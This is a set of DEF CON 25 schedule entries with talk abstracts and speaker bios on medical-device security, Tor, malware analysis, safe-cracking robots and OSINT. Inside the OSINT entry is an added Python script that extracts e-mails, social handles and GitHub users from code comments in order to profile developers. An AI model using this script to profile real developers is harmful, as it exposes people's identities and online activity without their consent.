Speaker: Dr. Stanislav Naydin and Vlad Gostomelsky

About Dr. Stanislav Naydin:
Dr. Stanislav Naydin is in residency for neurology with a background in pharmaceutical sciences. He is heavily focused on procedure-based medicine. He has been involved in a multitude of advanced surgeries and interventions. Prior to transitioning to the medical field, Stanislav was an industrial robotics designer and programmer in the glass industry.

About Vlad Gostomelsky:
Vlad Gostomelsky is a driven security researcher with a passion for securing technology that makes civilized life possible. He is particularly focused on satellite systems security, SCADA systems supporting the critical infrastructure and wireless networks. He specializes in the intersection of physical and network security.

We will engage the audience in a discussion of modern technological advances along with their ethical implications. We live in an era where the very implanted hardware that keeps you alive can be evidence in the court of law. Neuroscience is now a tool used by marketing firms. Following this discussion on medical ethics we will continue with a show and tell of some recent cases where medical devices were used as evidence against the patients. We discuss some of the medical devices that have been tested by us in the past year and the vulnerabilities that were discovered.




BHV - Pisa Room - Friday - 16:30-16:59


Title: Neurogenic Peptides: Smart Drugs 4-Minute Mile

Speaker: Gingerbread

About Gingerbread:
Long-time security malcontent Gingerbread, having been eliminated early on in this year's "Pop-and-Lock Potluck" (the nation's *premier* overweight break dancing competition), has returned to DEF CON with even more of his half-baked theories, bro-science, and questionable supply chain advice for your enjoyment. Early adopter of the "Not for human consumption" defense, Gingerbread has spent years conducting extensive research in the areas of cognition enhancing drugs and lifestyle regimens and in the process has become a walking encyclopedia of things NOT to do.

Abstract:
Everything is impossible until it isn't.

Every undertaking, defined by the hard limitations at the edges of our possible achievement.

Lossless electrical conductivity, human travel beyond the sound 'barrier', running a four-minute mile...each, seen as some unassailable foe until, one-by-one, these milestones were not just approached and then attained, but very often surpassed. With time, these limits transition from the superlative, to the standard, and what once was thought of as impossible, now becomes the benchmark of superior performance.

The world of cognition enhancing drugs is no different.

For nearly as long as such structures have been differentiated, the cells of the brain and nervous system have been acknowledged to behave very differently than most of the others in the body.

Unlike the perpetual turn over that the rest of the body enjoys, there are only a few restricted areas in the brain and CNS of adult humans where new nerve cells are being regularly created. What you are born with, is what you have to work with.

Or is it?

Reliably producing productive structural, as opposed to solely chemical, changes to the brain has long been seen as the 'Holy Grail' of Nootropics research. I am here today to discuss why the term "Four-minute mile" may be a bit more appropriate.

From the explosions of growth created in early childhood and in some illnesses, to the seemingly paradoxical benefits seen with the removal of malfunctioning structures, we are going to examine the sometimes baffling relationship between cognition and the physical structure of the brain, and how maybe, just maybe, there might be something you can do about it.




SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 11:00-11:59


Title:
Neutrality? We don't need no stinkin' Neutrality

1100 Friday
Munin
@munin

Net neutrality's pretty much a lost cause and traffic shaping according to network is pretty much inevitable at this point. Let's talk about ways to screw over the ISPs that perform these kinds of actions to pass our arbitrary traffic along their preferred channels in ways that they are unable to discern, taking advantage of their stupidity to give ourselves an advantage.


DEFCON - Track 4 - Friday - 13:00-13:45


Next-Generation Tor Onion Services

Friday at 13:00 in Track 4

45 minutes | 0025

Roger Dingledine, The Tor Project

Millions of people around the world use Tor every day to protect themselves from surveillance and censorship. While most people use Tor to reach ordinary websites more safely, a tiny fraction of Tor traffic makes up what overhyped journalists like to call the "dark web". Tor onion services (formerly known as Tor hidden services) let people run Internet services such as websites in a way where both the service and the people reaching it can get stronger security and privacy.

I wrote the original onion service code as a toy example in 2004, and it sure is showing its age. In particular, mistakes in the original protocol are now being actively exploited by fear-mongering "threat intelligence" companies to build lists of onion services even when the service operators thought they would stay under the radar.

These design flaws are a problem because people rely on onion services for many cool use cases, like metadata-free chat and file sharing, safe interaction between journalists and their sources, safe software updates, and more secure ways to reach popular websites like Facebook.

In this talk I'll present our new and improved onion service design, which provides stronger security and better scalability. I'll also publish a new release of the Tor software that lets people use the new design.

Roger Dingledine
Roger Dingledine is President and co-founder of the Tor Project, a non-profit that writes software to keep people around the world safe on the Internet.

Roger is a leading researcher in anonymous communications and a frequent public speaker. He coordinates and mentors academic researchers working on Tor-related topics, he is on the board of organizers for the international Privacy Enhancing Technologies Symposium (PETS), and he has authored or co-authored over two dozen peer-reviewed research papers on anonymous communications and privacy tools.

Among his achievements, Roger was chosen by the MIT Technology Review as one of its top 35 innovators under 35, he co-authored the Tor design paper that won a Usenix Security "Test of Time" award, and he has been recognized by Foreign Policy magazine as one of its top 100 global thinkers.

Roger graduated from The Massachusetts Institute of Technology and holds a Master's degree in electrical engineering and computer science as well as undergraduate degrees in computer science and mathematics.


Return to Index      -     

 

DEFCON - Track 1 - Friday - 10:20-10:40


Offensive Malware Analysis: Dissecting OSX/FruitFly via a Custom C&C Server

Friday at 10:20 in 101 Track

20 minutes | Demo, Tool

Patrick Wardle Chief Security Researcher, Synack / Creator of Objective-See

Creating a custom command and control (C&C) server for someone else's malware has a myriad of benefits. If you can take over its domain, you may then be able to fully hijack other hackers' infected hosts. A more prosaic benefit is expediting analysis. While hackers and governments may be more interested in the former, malware analysts can benefit from the latter.

FruitFly, the first OS X/macOS malware of 2017, is a rather intriguing specimen. Selectively targeting biomedical research institutions, it is thought to have flown under the radar for many years. In this talk, we'll focus on the 'B' variant of FruitFly that, even now, is only detected by a handful of security products.

We'll begin by analyzing the malware's dropper, an obfuscated perl script. As this language is rather archaic and uncommon in malware droppers, we'll discuss some debugging techniques and fully deconstruct the script.

While this dropper component also communicates with the C&C server and supports some basic commands, it drops a binary payload in order to perform more complex actions. However, instead of fully reversing this piece of the malware, the talk will focus on an initial triage and show how this was sufficient for the creation of a custom C&C server. With such a server, we can easily coerce the malware to reveal its full capabilities. For example, the malware invokes a handful of low-level mouse & graphics APIs, passing in a variety of dynamic parameters. Instead of spending hours reversing and debugging this complex code, via the C&C server we can simply send it various commands and observe the effects.

Of course this approach hinges on the ability to closely observe the malware's actions. As such, we'll discuss macOS-specific tools that can monitor various events, and where necessary detail the creation of custom ones (e.g. a 'mouse sniffer' that locally observes and decodes commands sent from the malware to the OS, in order to control the mouse).

While some of this talk is FruitFly and/or macOS specific, conceptually it should broadly apply to analyzing other malware, even on other operating systems :)

Patrick Wardle
Patrick Wardle is the Chief Security Researcher at Synack, and founder of Objective-See. Having worked at NASA and the NSA, as well as presented at many security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Currently, Patrick's focus is on automated vulnerability discovery, and the emerging threats of OS X and mobile malware. In his personal time, Patrick collects macOS malware and writes free macOS security tools.

@patrickwardle, objective-see.com


Return to Index      -     

 

Night Life - Track 1 - Thursday - 21:00-27:00


Title:
Official DEF CON Welcome Party

Come hang out and listen to some awesome music hosted by DEF CON.
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 23:00-24:00


Title:
Official Entertainment: ACID T

ACID T
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 25:30-26:00


Title:
Official Entertainment: CTRL/RSM

CTRL/RSM
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 21:00-22:00


Title:
Official Entertainment: DJDEAD

DJDEAD
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 22:30-23:00


Title:
Official Entertainment: DUALCORE

DUALCORE
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 22:00-23:00


Title:
Official Entertainment: JACKALOPE

JACKALOPE
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 24:00-25:30


Title:
Official Entertainment: KILL THE NOISE

KILL THE NOISE
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 25:30-26:00


Title:
Official Entertainment: KRISZ KLINK

KRISZ KLINK
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 23:30-24:00


Title:
Official Entertainment: LEFT/RIGHT

LEFT/RIGHT
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 23:00-23:30


Title:
Official Entertainment: MC FRONTALOT

MC FRONTALOT
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 21:00-22:00


Title:
Official Entertainment: MODERNS

MODERNS
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 25:00-26:00


Title:
Official Entertainment: NINJULA

NINJULA
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 24:00-25:30


Title:
Official Entertainment: REEL BIG FISH

REEL BIG FISH

For your DEF CON After Dark enjoyment, we present Friday's headliners, Reel Big Fish! They're fresh from their Beer Run Tour and ready to bring their trademark SoCal skank to the DEF CON masses.

In case you're not familiar, a bio snippet: "Reel Big Fish were one of the legions of Southern California ska-punk bands to edge into the mainstream following the mid-'90s success of No Doubt and Sublime. Like most of their peers, they were distinguished by their hyperkinetic stage shows, juvenile humor, ironic covers of new wave pop songs, and metallic shards of ska."

Sounds fun, yes? Yes.

Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 24:00-25:00


Title:
Official Entertainment: REID SPEED

REID SPEED
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 21:00-22:30


Title:
Official Entertainment: Richard Cheese

Richard Cheese

Friday, in the Chillout area, please to enjoy the nearly-too-swanky-to-function sounds of returning DEF CON performers (and DEF CON Soundtrack contributors!) Richard Cheese and Lounge Against the Machine!

America's loudest lounge singer Richard Cheese performs swingin' Vegas versions of rock and rap songs, "swankifying" popular Top40 hits into retro vocal standards. Imagine Sinatra singing Radiohead, and you've got Richard Cheese & Lounge Against The Machine.

The aforementioned DEF CON soundtrack is included with admission at DEF CON 25 or by donating to the EFF (url coming soon).

Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 26:00-27:00


Title:
Official Entertainment: SCOTCH AND BUBBLES

SCOTCH AND BUBBLES
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Thursday - 22:00-23:00


Title:
Official Entertainment: SKITTISH AND BUS

SKITTISH AND BUS
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Friday - 23:30-24:00


Title:
Official Entertainment: YT CRACKER

YT CRACKER
Return to Index      -     

 

Night Life - Track 1 & Chillout lounges - Saturday - 23:00-23:30


Title:
Official Entertainment: ZEBBLER ENCANTI

ZEBBLER ENCANTI

Saturday Night, y'all!

Zebbler Encanti Experience (aka ZEE) is what happens when Pixel Wizard and Techno Badger meet in the woods and decide to short circuit neural pathways of the nearby mushroom pickers with nothing short of bassquakes (9.0 on the scale of awesome) and complete visual reality replacement (somewhat too awesome and terrifying to be numbered anything in particular).

That historic meeting in the woods is the underpinning of the very garments that ZEE now wear at every event they perform. The mere loosening of a button of their coats' pockets opens up a wormhole of psychedelic visions and sub-sonic rattles. But Zebbler Encanti Experience do more than that. They open their minds fully to each and every dance floor and ask you to Get In There!

Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Friday - 09:30-09:59


Title:
One-click Browser Defense

0930 Friday
Brandon Dixon
@9bplus
One-click Browser Defense
Despite significant advances in security technology, web browsers still function as one of the primary vehicles for attack delivery, yet don't offer much in the way of protection. Using built-in interfaces, it's possible to bring defense directly to the browser without the need to change any behavior. In one click, you can add an additional layer of security to your most vulnerable assets: people.

Return to Index      -     

 

DEFCON - Track 2 - Friday - 12:00-12:45


Open Source Safe Cracking Robots - Combinations Under 1 Hour! (Is it bait? Damn straight it is.)

Friday at 12:00 in Track 2

45 minutes | Demo, Tool, Exploit

Nathan Seidle Founder, SparkFun Electronics

We've built a $200 open source robot that cracks combination safes using a mixture of measuring techniques and set testing to reduce crack times to under an hour. By using a motor with a high count encoder we can take measurements of the internal bits of a combination safe while it remains closed. These measurements expose one of the digits of the combination needed to open a standard fire safe. Additionally, 'set testing' is a new method we created to decrease the time between combination attempts. With some 3D printing, Arduino, and some strong magnets we can crack almost any fire safe. Come check out the live cracking demo during the talk!

Nathan Seidle
Nathan Seidle is the founder of SparkFun Electronics in Boulder, Colo. Nathan founded SparkFun in 2003 while an undergraduate student studying electrical engineering. After building the company across 14 years to over 130 employees he now heads the SparkX Lab within SparkFun, tinkering, hacking and building new products.

Nathan has built a large catalog of off the beaten path projects including a 12' GPS clock, a wall sized Tetris interface, an autonomous miniature electric bat-mobile, a safe cracking robot, and a hacked bathroom scale to measure the weight of his beehive. He believes strongly in the need to teach the next generation of technical citizens.

Nathan is a founding member of the Open Source Hardware Association. He has served on the board of OSHWA and continues to promote and serve the organization. Nathan has been invited to the White House to participate in discussions around intellectual property policy and patent reform and attended multiple White House Maker Faires. Nathan has spoken in front of Congress on copyright and trademark policy. He has presented on the many facets of manufacturing and open hardware at the National Science Foundation, Google, and Sketching in Hardware. Nathan has guest lectured at numerous institutions including MIT, Stanford and West Point Academy.

In their off time, Nathan and his wife Alicia can be found making rather silly electronics projects together for their local Public Library, their nieces and nephews, and Burning Man. Nathan and Alicia live in Boulder, Colorado with their pet tree Alfonso.

@chipaddict, @sparkfun, www.sparkfun.com


Return to Index      -     

 

CPV - Florentine Ballroom 4 - Saturday - 12:00-13:00


Title:
Operational Security Lessons from the Dark Web

Author:
Shea Nangle

Abstract:
The past 5 years have seen a number of arrests and a number of convictions of parties engaged in criminal activities on the Dark Web. From Dread Pirate Roberts to French Maid, Willy Clock to Shiny Flakes, and others, we will explore the operational security failures that led to their arrests, and in some cases, convictions.

Why look at this? There are lessons to be learned from these cases even if you aren't in a position to be accused of running a multinational drug distribution ring. Whether you are concerned with surveillance and/or reprisals from hostile nation-states or simply want to better guard your privacy, we can all learn from these cases.

Attendees will leave this session with concrete tactical recommendations for increasing the operational security of their online lives and protecting their privacy.

Bio:
Shea Nangle works in information security in the Washington DC area. His areas of interest include open source intelligence, operational security, and forensics. In his spare time, you can often find him homebrewing and attending heavy metal concerts.
Twitter handle of presenter(s): @ultrashea

Return to Index      -     

 

DEFCON - Track 2 - Thursday - 11:00-11:45


Opt Out or Deauth Trying! - Anti-Tracking Bots, Radios and Keystroke Injection

Thursday at 11:00 in 101 Track 2

45 minutes | 0025, Demo, Tool, Exploit

Weston Hecker Principal Application Security Engineer, "NCR"

It's hard not to use a service nowadays that doesn't track your every move and keystroke. If you absolutely must use these systems, why not give them the most useless information possible? Along with the fact that several companies are tracking their customers online, now they are taking it to physical brick-and-mortar stores. This talk will be geared toward looking at the attack surface of in-store tracking and attacking these systems for the purpose of overloading them or making the information so inaccurate that it becomes useless. Watch as a 32-year-old hacker's online profile is turned into that of a 12-year-old girl who loves horses!

Weston Hecker
With 12 years of pen-testing and 13 years of security research and programming experience, Weston is currently working on the application security team of NCR. Weston has recently spoken at DEF CON 22, 23 and 24, Black Hat 2016, HOPE 11, Hardware.IO 2016, TakeDownCon 2016, ICS Cyber Security 2016, BSides Boston, Enterprise Connect 2016, ISC2 Security Congress, SC Congress Toronto and over 60 other speaking engagements, from regional events to universities, on security subject matter. He is working with a major university's research project with the Department of Homeland Security on 911 emergency systems and attack mitigation, and has found several vulnerabilities in very popular software and firmware, including products from Microsoft, Qualcomm, Samsung, HTC and Verizon.


Return to Index      -     

 

RCV - Palermo room, Promenade level - Saturday - 15:15-15:59


OSINT Tactics on Source Code & Developers

Abstract

This practical talk is about using OSINT techniques and tools to obtain intelligence from source code. By analyzing the source code, we will profile developers in social networks to see what social networks they use, what they are saying, who they follow, what they like and much more data about them.

We will use well-known tools and custom Python scripts to automate the parsing of source code, analyzing comments for behavior and sentiment, searching for OSINT patterns in code and fingerprinting developers in social networks, among other things. The collected data will be plotted in different visualizations to make the information easier to understand.

The objective of the talk is to introduce attendees to OSINT tactics they can use to collect and analyze data, use the right tools and automate tasks with Python scripting. For this example we have targeted developers and their projects.

Come and learn some OSINT tricks you can apply to collect and analyze data!
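
To make the "parse the source, mine the comments, pivot to the developer" workflow above concrete, here is an added example written for this page; it is not Simon Roses's tooling or VULNEX code and makes no claim about how the talk's scripts work. It needs only the Python standard library. The two in-memory source files, and every name, address, handle and URL in them, are constructed for the demo; the comment syntaxes and indicator regexes are choices made here, not the talk's.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Constructed sample input: two small "source files" held in memory so the
# script runs offline. Names, addresses, handles and URLs are made up.
SAMPLE_FILES: Dict[str, str] = {
    "auth.c": (
        "/* Written by J. Doe <jdoe@example.org> -- ping me on twitter @jdoe_dev */\n"
        "#include <stdio.h>\n"
        "int check(char *p) {\n"
        "    // TODO: this is ugly, fix before release. See https://github.com/jdoe/authlib/issues/12\n"
        "    return 0;\n"
        "}\n"
    ),
    "deploy.py": (
        "# maintainer: ops@example.org\n"
        "import os\n"
        "def run():\n"
        "    # FIXME(asmith): hardcoded staging host, see http://wiki.internal.example/deploy\n"
        "    return os.getenv(\"HOST\", \"staging.example.internal\")\n"
    ),
}

# Comment syntaxes handled: C-family (// and /* */) and hash-style (#).
# Caveat: these regexes also fire on comment markers inside string literals,
# so treat hits as leads to verify, not as facts.
COMMENT_PATTERNS = {
    "c": re.compile(r"//[^\n]*|/\*.*?\*/", re.S),
    "hash": re.compile(r"#[^\n]*"),
}
EXTENSION_LANG = {"c": "c", "h": "c", "cpp": "c", "java": "c", "js": "c",
                  "py": "hash", "sh": "hash", "rb": "hash"}

# Indicators worth pivoting on. The handle pattern's negative lookbehind keeps
# it from matching the "@" inside an e-mail address.
OSINT_PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "handle": re.compile(r"(?<![\w.])@([A-Za-z0-9_]{2,15})\b"),
    "url": re.compile(r"https?://[^\s)>\"']+"),
    "marker": re.compile(r"\b(TODO|FIXME|HACK|XXX)\b(?:\(([^)]+)\))?"),
}


def lang_for(path: str) -> Optional[str]:
    """Pick a comment syntax from the file extension; None means skip the file."""
    ext = path.rsplit(".", 1)[-1].lower()
    return EXTENSION_LANG.get(ext)


def extract_comments(text: str, lang: str) -> List[str]:
    """Return every comment body in one file, multi-line block comments included."""
    return [m.group(0) for m in COMMENT_PATTERNS[lang].finditer(text)]


def scan_source(files: Dict[str, str]) -> Dict[str, Set[str]]:
    """Pull comments from each file and collect indicators by category."""
    found: Dict[str, Set[str]] = defaultdict(set)
    for path, text in files.items():
        lang = lang_for(path)
        if lang is None:
            continue
        for comment in extract_comments(text, lang):
            for kind in ("email", "handle", "url"):
                found[kind].update(OSINT_PATTERNS[kind].findall(comment))
            # Markers such as FIXME(asmith) name whoever owns the hack.
            for tag, who in OSINT_PATTERNS["marker"].findall(comment):
                found["marker"].add(f"{tag}:{who or '?'}")
    return dict(found)


def pivots(found: Dict[str, Set[str]]) -> Dict[str, Set[str]]:
    """Turn raw hits into the next lookups: mail domains, GitHub users, social handles."""
    out: Dict[str, Set[str]] = defaultdict(set)
    for email in found.get("email", ()):
        out["domain"].add(email.split("@", 1)[1].lower())
    for url in found.get("url", ()):
        m = re.match(r"https?://github\.com/([A-Za-z0-9-]+)/", url)
        if m:
            out["github_user"].add(m.group(1))
    for handle in found.get("handle", ()):
        out["social_handle"].add(handle.lower())
    return dict(out)


if __name__ == "__main__":
    hits = scan_source(SAMPLE_FILES)
    for kind, values in sorted(hits.items()):
        print(f"{kind:8s} {sorted(values)}")
    print("pivots  ", {k: sorted(v) for k, v in pivots(hits).items()})
```

Point it at a real checkout by replacing SAMPLE_FILES with a dict built from os.walk and open(). The pivot step is where the profiling described above starts: each mail domain, GitHub user and social handle becomes a query against the corresponding platform, and the marker owners tell you who was touching the ugliest parts of the code.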

Speaker Profile

Simon Roses (@simonroses) holds a B.S. from Suffolk University (Boston), Postgraduate in E-Commerce from Harvard University (Boston) and Executive MBA from IE Business School (IE, Madrid).

He is currently the CEO at VULNEX, driving security innovation. Former Microsoft, PricewaterhouseCoopers and @stake.

Simon has authored and cooperated in several security Open Source projects like OWASP Pantera and LibExploit. He has also published security advisories in commercial products.

Simon was awarded a DARPA Cyber Fast Track (CFT) grant to research application security.

Frequent speaker at security industry events including BLACKHAT, DEF CON, RSA, HITB, OWASP, SOURCE, DeepSec and Microsoft Security TechNets.
CISSP, CEH & CSSLP

Blog: www.simonroses.com


Return to Index      -     

 

DEFCON - Trevi Room - Friday - 20:00-21:59


Panel - An Evening with the EFF

Friday at 20:00 - 22:00 in Trevi Room

Evening Lounge | 0025

Kurt Opsahl Deputy Executive Director & General Counsel, Electronic Frontier Foundation

Nate Cardozo EFF Senior Staff Attorney

Eva Galperin EFF Director of Cyber security

Shahid Buttar Director of Grassroots Advocacy

Kit Walsh EFF Staff Attorney

Relax and enjoy an evening lounge while you get the latest information about how the law is racing to catch up with technological change from staffers at the Electronic Frontier Foundation, the nation's premier digital civil liberties group fighting for freedom and privacy in the computer age. This Evening Lounge discussion will include updates on current EFF issues such as surveillance online, encryption (and backdoors), and fighting efforts to use intellectual property claims to shut down free speech and halt innovation, discussion of our technology project to protect privacy and speech online, updates on cases and legislation affecting security research, and much more.

Kurt Opsahl
KURT OPSAHL is the Deputy Executive Director and General Counsel of the Electronic Frontier Foundation. In addition to representing clients on civil liberties, free speech and privacy law, Opsahl counsels on EFF projects and initiatives. Opsahl is the lead attorney on the Coders' Rights Project. Before joining EFF, Opsahl worked at Perkins Coie, where he represented technology clients with respect to intellectual property, privacy, defamation, and other online liability matters, including working on Kelly v. Arriba Soft, MGM v. Grokster and CoStar v. LoopNet. For his work responding to government subpoenas, Opsahl is proud to have been called a "rabid dog" by the Department of Justice. Prior to Perkins, Opsahl was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of Information Management & Systems. Opsahl received his law degree from Boalt Hall, and undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic Media and Privacy Law Handbook." In 2007, Opsahl was named as one of the "Attorneys of the Year" by California Lawyer magazine for his work on the O'Grady v. Superior Court appeal. In 2014, Opsahl was elected to the USENIX Board of Directors.

@kurtopsahl, @eff

Nate Cardozo
NATE CARDOZO is a Senior Staff Attorney on the Electronic Frontier Foundation's digital civil liberties team. In addition to his focus on free speech and privacy litigation, Nate works on EFF's Who Has Your Back? report and Coders' Rights Project. Nate has projects involving cryptography and the law, automotive privacy, government transparency, hardware hacking rights, anonymous speech, electronic privacy law reform, Freedom of Information Act litigation, and resisting the expansion of the surveillance state. A 2009-2010 EFF Open Government Legal Fellow, Nate spent two years in private practice before returning to his senses and to EFF in 2012. Nate has a B.A. in Anthropology and Politics from U.C. Santa Cruz and a J.D. from U.C. Hastings where he has taught first-year legal writing and moot court. He brews his own beer, has been to India four times, and watches too much Bollywood.

Eva Galperin
EVA GALPERIN is EFF's Director of Cybersecurity. Prior to 2007, when she came to work for EFF, Eva worked in security and IT in Silicon Valley and earned degrees in Political Science and International Relations from SFSU. Her work is primarily focused on providing privacy and security for vulnerable populations around the world. To that end, she has applied the combination of her political science and technical background to everything from organizing EFF's Tor Relay Challenge, to writing privacy and security training materials (including Surveillance Self Defense and the Digital First Aid Kit), and publishing research on malware in Syria, Vietnam and Kazakhstan. When she is not collecting new and exotic malware, she practices aerial circus arts and learns new languages.

Shahid Buttar
SHAHID BUTTAR is EFF's Director of Grassroots Advocacy, who leads EFF's grassroots and student outreach efforts, including organizing the Electronic Frontier Alliance. He's a constitutional lawyer focused on the intersection of community organizing and policy reform as a lever to shift legal norms, with roots in communities across the country resisting mass surveillance. From 2009 to 2015, he led the Bill of Rights Defense Committee as Executive Director. After graduating from Stanford Law School in 2003, where he grew immersed in the movement to stop the war in Iraq, Shahid worked for a decade in Washington, D.C. He first worked in private practice for a large California-based law firm, with public interest litigation projects advancing campaign finance reform, and marriage equality for same-sex couples as early as 2004, when LGBT rights remained politically marginal. From 2005 to 2008, he helped build a national progressive legal network and managed the communications team at the American Constitution Society for Law & Policy, and in 2008 and 2009 he founded the program to combat racial & religious profiling at Muslim Advocates. Outside of work, Shahid DJs and produces electronic music, writes poetry & prose, kicks rhymes, organizes guerilla poetry insurgencies, plays capoeira, speaks truth to power on Truthout, occasionally elucidates legal scholarship, and documents counter-cultural activism for the Burning Man Journal.

Kit Walsh
KIT WALSH is a staff attorney at EFF, working on free speech, net neutrality, copyright, coders' rights, and other issues that relate to freedom of expression and access to knowledge. She has worked for years to support the rights of political protesters, journalists, remix artists, and technologists to agitate for social change and to express themselves through their stories and ideas. Prior to joining EFF, Kit led the civil liberties and patent practice areas at the Cyberlaw Clinic, part of Harvard's Berkman Center for Internet and Society, and previously Kit worked at the law firm of Wolf, Greenfield & Sacks, litigating patent, trademark, and copyright cases in courts across the country. Kit holds a J.D. from Harvard Law School and a B.S. in neuroscience from MIT, where she studied brain-computer interfaces and designed cyborgs and artificial bacteria.


Return to Index      -     

 

DEFCON - Capri Room - Saturday - 20:00-21:59


Panel - Meet the Feds (who care about security research)

Saturday at 20:00 - 22:00 in Capri Room

Evening Lounge

Allan Friedman Director of Cybersecurity, National Telecommunications and Information Administration, US Department of Commerce

Amélie E. Koran Deputy Chief Information Officer, U.S. Department of Health and Human Services, Office of the Inspector General

Leonard Bailey Special Counsel for National Security, Computer Crime & Intellectual Property Section, Criminal Division, U.S. Department of Justice

Nick Leiserson Legislative Director, Office of Congressman James R. Langevin (RI-02)

Kimber Dowsett Security Architect, 18F

Security research is no longer a foreign concept in Washington, DC. A growing number of policymakers are not only thinking about its importance, but are eager to work with hackers to better understand the implications of policy and to help hackers navigate laws that affect security research. Officials from the Department of Commerce, the Department of Justice, Health & Human Services, General Services Administration, and Congress will talk about how security policy has been evolving; help you understand how you can get involved and make your voice heard; and host an extended Q&A. Hear about everything from making laws more hacker friendly to encryption to government bug bounties to IoT security. It's your opportunity to meet the feds and ask them anything.

Allan Friedman
Allan Friedman is the Director of Cybersecurity Initiatives at National Telecommunications and Information Administration in the US Department of Commerce. He coordinates NTIA's multistakeholder processes, bringing together the community on issues like vulnerability disclosure and IoT Security. Prior to joining the Federal Government, Friedman spent over a decade as a noted cybersecurity and technology policy researcher at Harvard's Computer Science Department, the Brookings Institution, and George Washington University's Engineering School. He has a degree in computer science from Swarthmore College and a Ph.D. in public policy from Harvard University, and is the Co-Author of "Cybersecurity and Cyberwar: What Everyone Needs to Know".

Amélie E. Koran
Amélie E. Koran serves as the Deputy Chief Information Officer for the U.S. Department of Health and Human Services, Office of the Inspector General. Amélie's path to DHHS OIG took her the long way around - through multiple industry sectors, academia, and the public sector. Her professional experience includes time spent at The Walt Disney Company, Carnegie Mellon University CERT/CC, Mandiant, The World Bank, and The American Chemical Society. She began her time in the public sector as Lead Enterprise Security Architect for the U.S. Department of the Interior, eventually moving on to lead Continuous Diagnostics and Mitigation implementation for the U.S. Treasury Department. Amélie later spent time on a leadership development rotation as part of the President's Management Council Fellowship serving the Federal CIO in supporting cybersecurity policy analysis and legislative review, where she took an active role in the government-wide Open Data Initiative and helped in giving "birth" to the United States Digital Service (USDS). She's an ardent advocate for innovative approaches to hiring talent and rationally applying security strategies and technologies for the Federal Government space.

@webjedi

Leonard Bailey
Mr. Bailey is Special Counsel for National Security in the Computer Crime and Intellectual Property Section. He has prosecuted computer crime cases and routinely advises on cybersecurity, searching and seizing electronic evidence, and conducting electronic surveillance. He has managed DOJ cyber policy as Senior Counselor to the Assistant Attorney General for the National Security Division and then as an Associate Deputy Attorney General. He has also served as Special Counsel and Special Investigative Counsel for DOJ's Inspector General. Mr. Bailey is a graduate of Yale University and Yale Law School. He has taught courses on cybercrime and cybersecurity at Georgetown Law School and Columbus School of Law in Washington, D.C.

Nick Leiserson
Nick Leiserson is Legislative Director to Congressman Jim Langevin (RI-02), a senior member of the House Armed Services and Homeland Security Committees and the co-founder of the Congressional Cybersecurity Caucus. Leiserson serves as Rep. Langevin's principal advisor on an array of issues, particularly homeland security; judiciary; and technology policy. He holds a degree in computer science from Brown University.

Kimber Dowsett
Kimber Dowsett is the Security Architect for 18F, a digital services agency based within the US Government's General Services Administration, where she secures cloud infrastructure architecture while also serving as the Chief Incident Responder for the 18F platform. She is passionate about privacy, encryption, and building user-driven technology for the public.

Recently named one of the 2017 Top Women in Cybersecurity by CyberScoop, Kimber’s background is in Information Security, Incident Response, Security Policy, and Penetration Testing. She is an avid admirer of Chiroptera and is a connoisseur of comic books and video games.

@mzbat


Return to Index      -     

 

DEFCON - Track 2 - Friday - 17:00-17:45


Panel: DEF CON Groups

Friday at 17:00 in Track 2

45 minutes | Audience Participation

Jeff Moss (Dark Tangent) Founder, DEF CON

Waz DCG

Brent White (B1TKILL3R) DCG and DC615

Jayson E. Street DCG Ambassador

Grifter DC801

Jun Li DC010

S0ups DC225

Major Malfunction DC4420

Do you love DEF CON? Do you hate having to wait for it all year? Well, thanks to DEF CON groups, you're able to carry the spirit of DEF CON with you year round, and with local people, transcending borders, languages, and anything else that may separate us!

In this talk, you'll hear from DEF CON's founder, Dark Tangent, who is also moderating the panel. Jayson E. Street, the Ambassador of DEF CON groups will also discuss updates about the program and share information from his global travel to help start groups around the world. We will also discuss what DEF CON groups are, how to get involved, as well as ideas for how to run a group, location ideas, and how to spread the word.

Founders of their own local DEF CON groups will also discuss the awesome projects of their groups, as well as projects from other groups, to give ideas to take back to your own DEF CON group. Projects we'll discuss range from custom badge builds, IoT devices, vintage gaming systems, custom built routers, smarthome devices and more!

Jeff Moss (Dark Tangent)
Bio Coming soon.

Waz
Bio Coming soon.

Brent White (B1TKILL3R)
Bio Coming soon.

Jayson E. Street
Bio Coming soon.

Grifter
Bio Coming soon.

Jun Li
Bio Coming soon.

S0ups
Bio Coming soon.

Major Malfunction
Bio Coming soon.


Return to Index      -     

 

DEFCON - Track 4 - Friday - 10:20-11:35


Panel: Meet The Feds

Friday at 10:20 in Track 4

75 minutes

Andrea Matwyshyn Cranky law professor.

Terrell McSweeny Commissioner, Federal Trade Commission

Dr. Suzanne Schwartz FDA

Leonard Bailey Special Counsel for National Security, Computer Crime & Intellectual Property Section, Criminal Division, U.S. Department of Justice

Lisa Wiswell Principal, Grimm
Fellow, Center for Strategic and International Studies

